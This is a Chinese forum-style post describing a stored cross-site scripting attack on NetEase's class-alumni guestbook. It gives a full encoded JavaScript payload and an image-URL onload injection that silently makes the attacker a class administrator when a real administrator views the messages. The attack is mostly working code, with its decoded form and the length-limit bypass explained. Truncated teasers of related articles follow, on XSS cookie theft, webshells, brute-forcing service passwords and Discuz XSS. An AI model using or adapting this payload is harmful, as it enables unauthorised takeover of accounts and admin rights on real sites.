也谈一个跨站的利用_漏洞研究

1.方法:

网易同学录留言功能存在跨站,这里演示一个利用它把自己加为班级管理员的方法。

在留言框里填写:

+++try%20%7B%0D%0A%09var%20as%20%3D%20document.getElementsByTagName%28%22a%22%29%3B%0D%0A%09var%20frm%20%3D%20document.getElementsByTagName%28%22iframe%22%29%5B0%5D%3B%0D%0A%09frm.onload%20%3D%20function%28%29%20%7B%0D%0A%09%09var%20oFrm%20%3D%20document.getElementsByTagName%28%22iframe%22%29%5B0%5D%3B%0D%0A%09%09oFrm.onload%20%3D%20%22%22%3B%0D%0A%09%09var%20oDoc%20%3D%20oFrm.contentWindow.document%3B%0D%0A%09%09oDoc.all%5B%22who%22%5D%5B1%5D.checked%20%3D%20true%3B%0D%0A%09%09oDoc.dealmember.action%20%3D%20%22backaction/UpdateClassMate.jsp%3Ff%3D1%22%3B%0D%0A%09%09oDoc.dealmember.submit%28%29%3B%0D%0A%09%7D%0D%0A%09frm.src%20%3D%20as%5B34%5D.href%3B%0D%0A%7D%20catch%20%28e%29%20%7B%0D%0A%09alert%28e%29%3B%0D%0A%7D---
在留言的贴图url的输入框里填写:

yun_qi_img/classhome_logo.gif" onload="var t=document.body.innerHTML;var s=t.indexOf('+++')+3;var e=t.indexOf('---');eval(unescape(t.substring(s,e)));">
管理员察看班级留言时就会把我添加为管理员。

2.原理:

留言框里填写的留言+++和---之间的部分代码解码后如下:

try {
 var as = document.getElementsByTagName("a");
 var frm = document.getElementsByTagName("iframe")[0];
 frm.onload = function() {
  var oFrm = document.getElementsByTagName("iframe")[0];
  oFrm.onload = "";
  var oDoc = oFrm.contentWindow.document;
  oDoc.all["who"][1].checked = true;
  oDoc.dealmember.action = "backaction/UpdateClassMate.jsp?f=1";
  oDoc.dealmember.submit();
 }
 frm.src = as[34].href;
} catch (e) {
 alert(e);
}
漏洞出在贴图url的输入框没有过滤url,我在这里贴一个图,加上个onload事件,只要图片
url有效,图片正常载入就会触发该事件,执行我的onload里的代码,而onload里的代码搜索
我的留言里的代码,进行解码,然后执行。因为图片url的长度有限制,所以我才做这么一次
跳转,把我要做的事情分为两步。

3.最后:

为什么要贴这个没啥技术含量的东西,主要是觉得比较funy,你不觉得这样的利用过程和溢出
跳转执行shellcode有异曲同工的意思,因为有长度限制,所以我们要把shellcode分为几部分,
第一部分跳到第二部分来突破长度的限制,所有漏洞的原理本身就相似。
跨站的利用也可以玩的很有意思,比如"现有html和js上下文的利用,自我隐藏,脚本变形,
突破长度限制,跨站漏洞蠕虫等等",抛个砖头在这里等大家的玉。

时间: 2024-10-30 19:24:22

也谈一个跨站的利用_漏洞研究的相关文章

网站程序中非SI漏洞的利用_漏洞研究

Part I 前言  现在网上最流行的网站攻击手段,要数得上SQL Injection了,虽然SI技术易学易用,并且容易取得较大的权限,但因其风头实在太大,现在一般稍有点安全意识的程序员都会注意到这个问题,并且通过GET方法提交的数据会被服务器记录在案,而让网管很容易找到入侵者.  非SI类攻击相对来说获得的服务器操作权限不大,但对于以获得数据为目的的入侵还是很有用的.  Part II 方法介绍  常规的非SI类攻击有如下几种:  一. 跨站脚本攻击(XSS)  跨站脚本攻击不会直接对网站服务

Access的跨库查询 (图)_漏洞研究

大家还记得mssql的跨库查询吧,其实在access中也可以实现2个数据之间的交叉查询.下面我就给大家介绍下access的跨库查询. 首先让我们看看在access里是怎样实现对mdb文件进行查询的,我们随便创建个空数据库,对数据库D:\daos\db\daidalos.mdb里的admin表的内容进行查询,SQL语句为: javascript:if(this.width>500)this.width=500" border=0> 查询后,成功返回目标数据库里表admin表里的内容:

PollVote投票系统漏洞利用_漏洞研究

PollVote是一个投票系统,今天看了非安全的杂志,看了利用方法,  不过作者说利用过程的时候很烦琐,关键的时候又没说明白,  简单的说一下``  首先建立2个文本 分别是creatfile.txt和phpdoor.txt  creatfile.txt内容写  <?  $f=file_get_contents("http://www.hackeroo.com/phpdoor.txt");  $ff=fopen("111.php","a")

河南移动网络客服系统验证码的缺陷分析和利用!_漏洞研究

先声明哦 本文没有技术含量---只是为了证明java也可以作破解工具 中国移动的在线客服系统大家应该非常熟悉,因为我是移动忠实的河南用户,自然就从河南移动说起.在移动大厅办理过业务的用户都很清楚,用户密码只能设置成6位数0-9.而网上服务系统和移动的核心数据库是同步的,密码也只能局限为6位数字.如此简单的密码组合非常适合暴力破解. 我们来分析一下暴力破解的可行性.首先,系统对当天登录的次数要没有限制,我随便输入一个手机号测试系统容错次数.我试了十次,依然可以进入登录界面(yes-有戏).接下来,

最新的黑客技术:XSS跨站脚本攻击详细介绍_漏洞研究

总体上介绍 简单介绍什么是XSS攻击 如何寻找XSS漏洞 对于XSS攻击的总体思路 来自内部的攻击: 如何寻找内部的XSS漏洞 如何构造攻击 如何利用 结何实例攻击,如DVBBS&BBSXP 来自外部的攻击 如何构造XSS攻击 如何欺骗管理员打开 XSS与其它技术的结何 与mssql injection的结合 QQ跨站的结何 国内大型统计网站的跨站漏洞 社会工程学 制作恐怖的flash木马 制作方法由李丰初写 总结  正文: XSS总体介绍 什么是XSS攻击 XSS又叫CSS  (Cross S

当备份数据库不能用时.用邮件列表得到WEBSHELL!(图)_漏洞研究

今天上午闲着无聊,刚好一个朋友发过来一个网站的后台管理密码.他要我帮他看看.我说你得到后台了.可以用备份数据库功能得到WEBSHELL啊.你还发过来干嘛.他说后台有数据备份的选项.但是不能用.大家看一下图!  列表得到WEBSHELL!(图)_漏洞研究-数据库备份拿shell">  里面有备份的选项.但是点了之后出现错误!应该是管理员把文件改名了.或者是位置改变了.不能备份数据库,那怎么办,不能白白的浪费这样的一个机会.我就在后台里面到处看了一下.发现可以通过改网站注册用户的邮件地址.我们

PHP博客程序C-blog2.0漏洞测试大揭密(图)_漏洞研究

c-blog2.1测试手记 朋友买了空间支持php但是没有mysql数据库,说是这空间商主要是支持asp脚本的.哎 难道就不能玩php了吗?  嘿嘿 可以用php+access的php程序啊.百度了下发现了c-blog这个程序,它有个php+access版本的.down下了看看,就有了这次测试的结果. 1.暴出物理路径 在看了这个blog后,发现他写的到上没什么太大的bug,文件比较少而且简结. 它的说明上看到了如下: ./include   包含常用类库 编辑器 配置文件 -->/config

BBSXP5.15跨站攻击漏洞_漏洞研究

前言:在新云网站管理系统1.02出来的时候,他的留言本就存在跨站漏洞,我测试了黑客动画吧,还好没有开放留言本功能,然后又测试了黑软基地 居然可以成功利用,和新云官方网站都成功拿倒了管理元的cookies.  想不到吧. 看来跨站不得不防范啊!  BBSXP的漏洞近段时间闹得可火.现有的漏洞大家都见过了,就不说了.今晚无聊,看了看BBSXP 5.15最新版的几个文件代码,发现还是存在跨站攻击的漏洞.  Cookies.asp文件,代码如下:   对提交的 "no" 参数没做处理.再看se

PHP著名开源论坛:Discuz!跨站大全_漏洞研究

在discuz!的发贴.回贴.PM等中的subject都没有经过过滤,所以也可以添加代码.   例如   http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22   效果是首先弹出自己的cookie   利用方法:把上述代码放置到img中.   适用版本:discuz!2.x   discuz!3.x   一种利用discuz!2.0漏洞进行欺骗获得cookie的尝试   通过测试XXXFan论坛的PM功能存在一个安全漏洞,具体描